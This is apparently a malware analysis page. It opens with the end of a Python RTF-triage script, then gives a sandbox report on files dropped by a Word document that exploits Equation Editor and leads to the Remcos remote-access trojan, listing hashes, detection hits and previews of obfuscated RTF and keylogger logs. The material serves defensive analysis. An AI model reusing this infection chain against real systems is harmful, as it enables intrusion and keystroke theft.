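        "object_words": objects,
        # Flag only when the malformed header/destination coincides with an
        # embedded object, which is what exploit documents combine.
        "suspicious": is_rtf and (nonstandard_version or bad_destination) and bool(objects),
    }


# Constructed sample modelled on the dropped RTF's preview; not the real file.
SAMPLE_RTF = (
    b"{\\rtf1\r\n{\\*\\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqF}\r\n"
    b"{\\object\\objemb\\objupdate{\\*\\objdata 0105000002000000}}}"
)


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RTF).items():
        print(f"{key}: {value}")
    print(rtf_indicators(SAMPLE_RTF))
```

Run it against a real dropped file by replacing SAMPLE_RTF with the file's bytes; the hashes and entropy should match the report's fields for that file, and the indicator dictionary gives a quick reason to escalate an RTF before opening it in a parser.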

Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):247044
Entropy (8bit):3.7540611984178978
Encrypted:false
SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
MD5:AFA95FFEF9A1E2EE01B008DA56592B30
SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
Malicious:false
Preview:..L.l.i.k.N.k.f.R.e.C.q.C.K.L.U.B.G.e.u.c.f.z.f.P. .=. .".G.L.I.l.i.f.L.U.A.W.n.p.h.k.G.U.x.A.c.B.K.A.L.i.".....i.f.G.t.L.K.W.W.U.C.G.P.m.N.m.g.a.k.i.z.o.O.W.C. .=. .".e.R.K.t.W.u.C.G.W.K.W.K.B.c.O.P.j.i.P.W.O.L.l.i.".....K.W.x.z.L.f.k.A.f.N.m.T.f.W.a.L.f.g.T.c.O.i.h.i. .=. .".L.G.O.z.m.B.A.j.G.L.l.Q.G.W.o.h.f.z.W.W.k.P.U.s.".....C.W.Z.p.G.A.b.l.B.W.h.R.d.K.v.c.N.W.W.h.c.o.A.T. .=. .".o.U.a.U.e.W.h.W.c.K.C.T.c.I.d.c.q.a.h.U.a.R.h.B.".....i.L.U.x.d.z.m.L.u.i.q.x.c.c.A.L.C.v.N.c.i.o.U.A. .=. .".G.W.c.N.P.f.N.K.o.m.L.U.P.J.Z.h.O.d.p.p.C.o.i.K.".....c.L.t.U.N.c.C.x.e.W.Z.d.B.T.p.g.U.L.Z.W.q.b.U.K. .=. .".O.K.W.W.p.W.l.o.K.L.f.W.A.P.z.k.U.e.L.L.U.R.m.W.".....i.u.K.s.x.s.h.J.c.K.B.n.G.k.m.m.r.G.H.l.C.h.N.q. .=. .".G.k.c.f.U.k.W.i.h.z.R.z.G.G.C.L.C.U.c.Z.P.G.i.W.".....W.u.i.L.K.f.a.W.W.c.G.Z.W.Z.J.f.I.P.C.Z.O.f.h.N. .=. .".a.N.b.K.K.b.f.k.W.L.K.z.K.u.C.p.W.R.m.N.f.L.W.L.".....L.q.m.P.K.z.v.m.A.K.G.W.N.N.W.G.A.l.L.i.o.W.A.k. .=. .".s.S.Z.I.c.i.W.K.L.K.O.L.o.W.N.b.K.C.U.L.k.t.q.d.".....d.Q.z.O.

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):134544
Entropy (8bit):2.9989105127453892
Encrypted:false
SSDEEP:768:SxZNfNMxUS1u40TiTKAvGNeni/m8xXZOm:oZNu6i0TiTKeYh/tTT
MD5:A01193C207CD2FE313F5CEDA3FD76B7A
SHA1:62173798263F9D7310F3F5942668DEA29AA5A90F
SHA-256:6E7BB9F3D39B5A50FA8FD08B066B0A92001BEAEAE96C9FCBFDB5BCFB9F0F6C20
SHA-512:6B4344CC538B502EF1F6D3C9FAF2973096B40054A0648078FEF21F451FF61A11906E9BEF01DE80EA4EE032EC8C17877FCC9FB05493512DC210FDA7C5F62F3E22
Malicious:false
Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n......................................... w. ..0.......)".A.l*w"........atQ.........l*w.........`tQ........0...../....j...........D...../j...........T...{./j.....*wd....O./j.......8....I./ ...h....Y..I./)".A

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):213168
Entropy (8bit):2.988970416935335
Encrypted:false
SSDEEP:1536:oR4CEQoVghaqdV+9ccR9qyn6z0G1+/WQOyFBUXjM9G2j58ThJAbH92f2bcrjZd0R:l9tkQRmQzpr5Txp1
MD5:33B91CBFFE8E675C476B0BA3AFC61062
SHA1:447B4D09F2D65DBFB28462556A33A047394E8D97
SHA-256:C81DE0EEC367CC4FDDADC14B92EA89BE12C856ACD249D45F93FCD69A8D50FD79
SHA-512:3EBB6F881334115B52FC4F426A4F681B22645B967FA03BF367C43CD7BB078C74BBFB7F41ABBB6132429704CB6E338808468E607298B999B63C7D246DA03750F2
Malicious:false
Preview:....l............................E...U.. EMF.....@..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d.......n......._.......n...|.......!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Rich Text Format data, version 1
Category:dropped
Size (bytes):115666
Entropy (8bit):2.7217050368726605
Encrypted:false
SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
MD5:5EAD5713E1263695BFF52404264DD3B4
SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
Malicious:false
Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, Author: ditekSHen
Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):318964
Entropy (8bit):5.498202232475241
Encrypted:false
SSDEEP:3072:hxelS/aoQOP7D4mD3f5R81Zk6ZJE6GOolsvm8:hxelSL34mD3f5ReZdZJElOFm8
MD5:1E74425F96A5DDD00E5494225278C22A
SHA1:97D7ADC10C419F1EBF2B2754CDFEFD3371CD95B9
SHA-256:420C08455ABFF24376B505BC34EE9021A10C5BF5285D3FD038778409EC78B67C
SHA-512:E0232C415E1171AABA244152F0D4CDD8328E0EF051FC24CFD2B472199A0AE41A451401A3492C04A612A9ACD3407047047C8A170A4B2A68EB80B4B862B699EA1B
Malicious:false
Preview:....l...............2...........@m..?... EMF........ .......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):66768
Entropy (8bit):2.9045642362096498
Encrypted:false
SSDEEP:384:gQbwIVguebyln1oBJ7v4rPMPRDJWKf4kfeHHCCKlRFwiACs:gQb5Tebyl1ojvw4RlWKf41HHC/KiACs
MD5:7DC8E1999A1AF96FE63D5E493356A288
SHA1:705D5C1FFDF27BF31F6408A1F98FA01547375612
SHA-256:611408FC701324B9EE55DE35EF19AA58103007691865E3900EC6E03BDE70F0C9
SHA-512:9275DD7D20A0EC72C0E8F1291EEB2237E6464857B50D114E3F615CFC27199EB07256BA65DD04BFDD664EAEBCC50909370D0E42FC10DA8863C3D6413B54DBB622
Malicious:false
Preview:....l...........k...................@.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
Category:dropped
Size (bytes):1921536
Entropy (8bit):5.057631864548071
Encrypted:false
SSDEEP:12288:WHmzCJEfXMGrc6/XRmzHJElD3DERnLRmF8Dbc3W0J:W1Kzrc0AEbARM8f2
MD5:EC6F53BCFBAD65918025B30289922BFE
SHA1:2A25AEDE88BFA6BCF86115FFE85ADA4B91F6D13C
SHA-256:C5C91C491999965E299CA8B95FC3071D5737888AAF0BD24036969CDEB9E76728
SHA-512:D5E9F31B4A6E5B844427CE5FA49E0D402EAC9C1DDC22A351C5962F2B45311ADC79922CA723129DDA5986D1459891D488F18250D489A8EEC2BA187079475EBF42
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview:......................>...............................................................................................................................................................~.......T........................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
Category:dropped
Size (bytes):1536
Entropy (8bit):2.8462879894458504
Encrypted:false
SSDEEP:12:YXHH3HpkyKptyKpkyKptECbeT+dE/fd0Ivk2WWHsmXT7MTe2IXTesZSDMz:In3jK+KjKDrd8NvRsMXMHmyMz
MD5:8024A9B919C00968F5F9BBE6B6B6226B
SHA1:33A9B07B4709CAB429DB14CEA49A9B538305F51A
SHA-256:7CEB9E403F7C09773FC2646D85D42C6F97B0641B35BC74A2ACDBA6AF9AD7088E
SHA-512:CA97FF409D7F96DBB570C0FB03D21F0083A3349F72CBDF95EC04A70E9E868DC5D18BB5F8E43ADCAD068E6B003E5E2623C1D2F72785E9EC99F604E8DF03996579
Malicious:false
Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>...........................E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...5.4.=.5...5._.2.......................................................................................................................................................................................................t...v...x...z...~............................................................................................................................................................................................................................................................................................................................................................................................................d........gd........

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):15392
Entropy (8bit):3.6169394259377343
Encrypted:false
SSDEEP:384:7V3yfuaKs05qt4rdS8pAcc/+He4zYh83mVWpwpSJM5CJ:x3yfuX1wtUS8acvek3rkLCJ
MD5:03B2C6040807D398FF34A9CAC8D057E6
SHA1:60D974140A3C7EE48E7214FE809947AAE0124332
SHA-256:BA17C33D3F6D7A63E1753150C98727ADB07352BFEED7AE9F57964D2B4D99975D
SHA-512:398148D1136AE2BCBE14A91C415B7E36BA1981987CA408F5B1CAB59EA8201EA94B20ACE89CE3517C6E71F9DB90220857166FD540CC8AF93FF98328D5124605E7
Malicious:false
Preview:7.4.8.5.1.1.1.5.9.1.[.2.2.5.1.+.).;.5./.!.@.*.:.4._.[.?.9.`.9...'.|.>.!.9.<.!.^.3.%.+.^.|.~.%.*.?.+.2.<.7.%.:...`.?.].1.|.?.=.,.8.%...~.#./.:.%.?.<.<.!.|.$.6.%.+.?.9.%.!.2.?...%.=._.].1.1.'.'.9.?.3.7.%.8.~.7.?.$./.,.#...&.+.2.:./.)._...'.;.-.].|.?.=.!.*.).?.*.(.].&.4.4.`.1.*...8.?.:.@.<._...$...,.2.6.=.#.6.#.`.?.^.~.$.5.9.>.<./.%.~.%.%.=.*.?.4.@...4.=.?.?.2.4.~.?._.=.%...)...^._.^.[.*.1.|.7.#.$.*.$.%.>.7.8...$./...).7._.].?.,.2.8.4.).0.+.`./.7.*.6.>._.+.~.5.5.>.*.9.;.@.=.2.|.)...&.%.6.;.?.@./.~.../.?...=.,.?.3.1.3.$.!...~.9.4.#.3...[.[...~.4._.(.?.].:.@.~.[.`.%.#.#.>.!.!.`...7...$.!.+.#...&.,.~.=.[.#.?.*.'._.].;.^.3.].[.6.!.@.|.?.;.%.8.<.@.<.].).8...#.-.8.2.>.=.'._./.7.7.6.6.:.`.8.*._.*.`.,.~...?.<.8.2.:.[.<.%.?.%.?./..._.2.;.[./.?.7.?.*...4.0.,.^...!.?.(.@.].%.4.^.!.:.~...%.-.@.(...4.'.5.8.!...3.:.).(.+...=.?...-.2.4.?.^.?...;.?.=.?.`..._.[.*.$.;.^._.;.;.8.#...7.=.'.6.:._.*.*./.5.6.-.;.=.%.].5.8.^.,.#...<.*...%./.*.%.8.).(.&.#.(.$.%.|.|.!.-...|.8.|.`.).0.'.!.8...?.[.@.(.%.&.%.;.4.-.;.

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                                Entropy (8bit):1.138859744193261
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:YO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:YOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                MD5:0E0D23800D2C6377BA7381EFFD6EAE7A
                                                                                                                                                                                                SHA1:A2E48DE09EE5B7943723CC4A55A4F0C6D076B0C1
                                                                                                                                                                                                SHA-256:2E37BC246DEC4F20276088517433D3324E80A1B6A4ABEC57003CB3288BF04381
                                                                                                                                                                                                SHA-512:4F0D94F7345E328ACFF76999D6A2D8CA4B96CBA5CD7617C12405FE0FBBE1994EB6DA1B3583047ADCD910428CC2EDA523D608D143EC01EBDE76EDC82D65BDF69E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                                Entropy (8bit):1.138859744193261
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:YO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:YOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                MD5:0E0D23800D2C6377BA7381EFFD6EAE7A
                                                                                                                                                                                                SHA1:A2E48DE09EE5B7943723CC4A55A4F0C6D076B0C1
                                                                                                                                                                                                SHA-256:2E37BC246DEC4F20276088517433D3324E80A1B6A4ABEC57003CB3288BF04381
                                                                                                                                                                                                SHA-512:4F0D94F7345E328ACFF76999D6A2D8CA4B96CBA5CD7617C12405FE0FBBE1994EB6DA1B3583047ADCD910428CC2EDA523D608D143EC01EBDE76EDC82D65BDF69E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                Entropy (8bit):3.5101427677233845
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:6lQl0lPNMCl55YcIeeDAlb40QKlAlQ8HSNombQOfxNa/WAv:6lw0lqmhech4RlQ8Hyp50/W+
                                                                                                                                                                                                MD5:E1DABB4D78C1419C7EF919F54522F95D
                                                                                                                                                                                                SHA1:15C4F1E2BA4196A645C9606F7FBD7FA2630EC319
                                                                                                                                                                                                SHA-256:9C38955F016DFA84E6FC10A943CB076E783750EFAF0B9B702C18DF98B8229486
                                                                                                                                                                                                SHA-512:F74717D81910CBD0FA3A850C95CC77E79715B1ED11B5848D230BF05EE100B6BDD83D4B867F4D20E274C0DC9DE6672E1E1A36BE9F07DB396E7DA446611BBABBAD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, Author: Joe Security
                                                                                                                                                                                                Preview:....[.2.0.2.4./.0.9./.3.0. .1.0.:.2.4.:.3.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.A.M.G. .C.a.r.g.o. .L.o.g.i.s.t.i.c. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025623734588153504
Encrypted:false
SSDEEP:6:I3DPcJ64SHvxggLRjOZNEvHRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYGnOCvBvYg3J/
MD5:5D65BF2221243FB28855F824B066129B
SHA1:C06C438DE27EC2916CB11C696D61AFF9D631570A
SHA-256:F09D6501CE467A47318A59BD445C8CDD763804D08445BA37004D44CCE0A40396
SHA-512:9A535C1A5D53C9CD6B4B49F40C0911AB36484B64B99FAAD136CB4D3891A0F172BE8C03B59F0AA9252172FF74687878CF74FFE6BADE9769D61FBDE1D1A63AD9D8
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.0255829556424752
Encrypted:false
SSDEEP:6:I3DPcLavxggLRX7oji1t92YltRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0c77oGbM+vYg3J/
MD5:3E38E717CD5D3574FC4053405C7C87F5
SHA1:A65A342924CB79033B2106DE881C8FB8C4625E94
SHA-256:0A7E9C4611DED6C09BB8FF5ACD9636C55D1ADBDF1600420FB4435CA02C2ABD63
SHA-512:9F27359A2501233490D377FCA9A8534C4C94FC3F0127FB9CF9FE22C3604F3BF3AAE0780AEA6A4CAC559E6406054275755DD4C5E863DFB70653F9F046F106303B
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Mon Sep 30 13:24:03 2024, length=788502, window=hide
Category:dropped
Size (bytes):1059
Entropy (8bit):4.5718978921754765
Encrypted:false
SSDEEP:12:8qjgXg/XAlCPCHaX8BYYlB/Pr+X+WS88NKOlQ1juicvbKM14OOlQtNDtZ3YilMMm:8k/XTM3ls88GQBNeTYQPDv3qY/57u
MD5:2BE4F24F88C8E6C62B945BED0C099B91
SHA1:E3D694BF373B9BC8EBF2E36530E42978DAA7A145
